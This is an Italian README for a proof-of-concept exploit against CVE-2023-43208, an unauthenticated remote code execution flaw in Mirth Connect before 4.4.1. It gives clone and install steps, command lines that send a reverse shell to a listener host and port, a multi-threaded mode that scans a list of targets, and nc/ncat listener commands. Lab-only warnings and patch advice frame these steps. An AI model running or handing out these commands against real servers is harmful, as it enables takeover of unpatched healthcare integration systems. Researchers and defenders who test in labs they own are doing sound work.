
Un exploit proof-of-concept per CVE-2023-43208, una vulnerabilità di esecuzione remota di codice in Mirth Connect precedente alla versione 4.4.1.
⚠️ SOLO PER USO DIDATTICO E DI LABORATORIO ⚠️
Una proof-of-concept per CVE-2023-43208, una vulnerabilità di remote code execution in Mirth Connect precedente alla versione 4.4.1.
Questo strumento è strettamente destinato a:
NON USARLO:
Sei responsabile del rispetto di tutte le leggi e normative applicabili. L'uso improprio di questo strumento può comportare accuse penali.
Questo exploit sfrutta la vulnerabilità di deserializzazione XML nell'endpoint /api/users di Mirth Connect, consentendo l'esecuzione remota di codice non autenticata sulle versioni interessate (< 4.4.1).
Questa è una vulnerabilità CRITICA e dovrebbe essere testata SOLO in ambienti di laboratorio isolati con sistemi di tua proprietà.
requirements.txtgit clone https://github.com/M0h4/CVE-2023-43208-EXPLOIT.git cd CVE-2023-43208-EXPLOIT
pip install -r requirements.txt 💻 Utilizzo (SOLO PER USO IN LABORATORIO) Modalità Interattiva (Consigliata per il Laboratorio) bash python exploit.py Modalità da Riga di Comando bash
python exploit.py -u https://target:8443 -lh 10.10.14.5 -lp 4444
python exploit.py -f targets.txt -t 50 -o vulnerable.txt
python exploit.py -u https://target:8443 -lh 10.10.14.5 -lp 4444 --no-interactive Opzioni text -u, --url URL del target da sfruttare (SOLO PER USO IN LABORATORIO) -lh, --lhost Host in ascolto (il tuo IP) -lp, --lport Porta in ascolto -f, --file File contenente gli URL dei target da scansionare -o, --output File di output per salvare i risultati della scansione -t, --threads Numero di thread per la scansione (default: 50) --no-interactive Esegui in modalità non interattiva 🎯 Esempio di Ambiente di Laboratorio Configura il tuo laboratorio:
Installa la versione vulnerabile di Mirth Connect (< 4.4.1) in una VM isolata
Usa una rete controllata (es. NAT/Host-only in VirtualBox/VMware)
Non esporti mai a internet
Avvia il tuo listener:
ncat -lnvp 4444
nc -lnvp 4444 Esegui l'exploit nel tuo laboratorio:
python exploit.py -u https://192.168.1.100:8443 -lh 192.168.1.50 -lp 4444 🧪 Requisiti dell'Ambiente di Test Rete/VLAN isolata
Solo macchine virtuali
Nessun dato di produzione
Regole firewall che bloccano l'accesso esterno
Autorizzazione appropriata documentata
📝 Dettagli Tecnici Tipo di vulnerabilità: RCE tramite deserializzazione XML
Versioni interessate: Mirth Connect < 4.4.1
Versione corretta: 4.4.1 e successive
Punteggio CVSS: 9.8 (Critico)
Vettore di attacco: Rete
Autenticazione: Non richiesta
L'exploit utilizza i gadget di Commons Collections per ottenere RCE attraverso l'endpoint /api/users.
🛡️ Misure di Protezione Se stai eseguendo Mirth Connect:
✅ Aggiorna alla versione 4.4.1 o successiva
✅ Limita l'accesso di rete alle interfacce di amministrazione
✅ Implementa un'autenticazione adeguata
✅ Monitora payload XML sospetti
👥 Crediti Autori originali: K3ysTr0K3R & Chocapikk
Modificato da: M0h4
CVE: CVE-2023-43208
⚠️ AVVERTENZA FINALE
╔══════════════════════════════════════════════════════════════╗ ║ QUESTO STRUMENTO È SOLO PER USO IN LABORATORIO ║ ║ L'uso non autorizzato è ILLEGALE e NON ETICO ║ ║ Ti assumi TUTTI i rischi e le responsabilità ║ ║ L'autore NON si assume NESSUNA responsabilità per l'abuso ║ ╚══════════════════════════════════════════════════════════════╝